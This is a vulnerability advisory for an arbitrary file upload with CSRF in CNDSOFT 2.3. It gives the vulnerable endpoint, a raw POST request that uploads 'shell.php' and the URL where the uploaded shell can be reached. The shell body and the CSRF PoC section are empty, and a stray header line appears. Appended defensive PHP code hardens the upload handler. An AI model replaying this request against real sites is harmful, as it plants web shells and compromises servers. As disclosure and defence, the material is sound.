=========================================================================================================
# Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php)
# Author: Besim
# Google Dork: -
# Date: 19/10/2016
# Type: webapps
# Platform: PHP
# Vendor Homepage: -
# Software Link: http://www.phpexplorer.com/Goster/1227
# Version: 2.3
=========================================================================================================

Vulnerable URL and Parameter
========================================

Vulnerable URL       = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla
Vulnerable Parameter = &mesaj_baslik

TECHNICAL DETAILS & POC & POST DATA
========================================

POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/ofis/index.php?is=kullanici_tanimla
aa
Content-Type: multipart/form-data; boundary=---------------------------5035863528338
Content-Length: 1037

-----------------------------5035863528338
Content-Disposition: form-data; name="utf8"

a
-----------------------------5035863528338
Content-Disposition: form-data; name="authenticity_token"

CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_adi"

meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_sifresi"

meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_mail_adresi"

m@yop.com
-----------------------------5035863528338
Content-Disposition: form-data; name="MAX_FILE_SIZE"

30000
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_resmi"; filename="shell.php"
Content-Type: application/octet-stream

-----------------------------5035863528338
Content-Disposition: form-data; name="personel_maasi"

5200
-----------------------------5035863528338--

CSRF PoC - File Upload (Shell.php)
========================================

========================================

Access File: http://www.site_name/path/personel_resimleri/shell.php

RISK
========================================

An attacker can upload arbitrary files.

--
Besim ALTINOK
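As an added defensive counterpart (example code, not part of the advisory or of the CNDSOFT code), a hardened handler for a profile-image field such as kullanici_resmi: it checks the submitted authenticity_token against a per-session secret with a constant-time comparison, decides the file type by content sniffing instead of trusting the client's filename or part Content-Type, and stores the file under a random server-chosen name. The session key name, the field names and the upload directory are assumptions.

```php
<?php
// Added example, not CNDSOFT code. Assumptions: session key 'csrf_token',
// form fields 'authenticity_token' / 'kullanici_resmi', and an upload
// directory that the web server serves as static files only (no PHP execution).
declare(strict_types=1);
session_start();

const UPLOAD_DIR = __DIR__ . '/personel_resimleri';
const MAX_BYTES  = 300000;
// Allowlist keyed by the sniffed MIME type; the value is the extension we assign ourselves.
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

function csrf_ok(array $post, array $session): bool {
    $sent     = $post['authenticity_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // hash_equals avoids timing leaks; an empty session secret must never match.
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

function store_profile_image(array $file): string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // MAX_FILE_SIZE in the form is client-controlled, so enforce the limit server-side.
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Type comes from the bytes on disk, never from filename="..." or the part's Content-Type.
    $mime = (string) (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!array_key_exists($mime, ALLOWED) || @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an accepted image');
    }
    // Random server-chosen name with our own extension: "shell.php" never reaches disk.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);
    return $name;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_ok($_POST, $_SESSION)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
    try {
        echo 'stored as ' . htmlspecialchars(store_profile_image($_FILES['kullanici_resmi'] ?? []), ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```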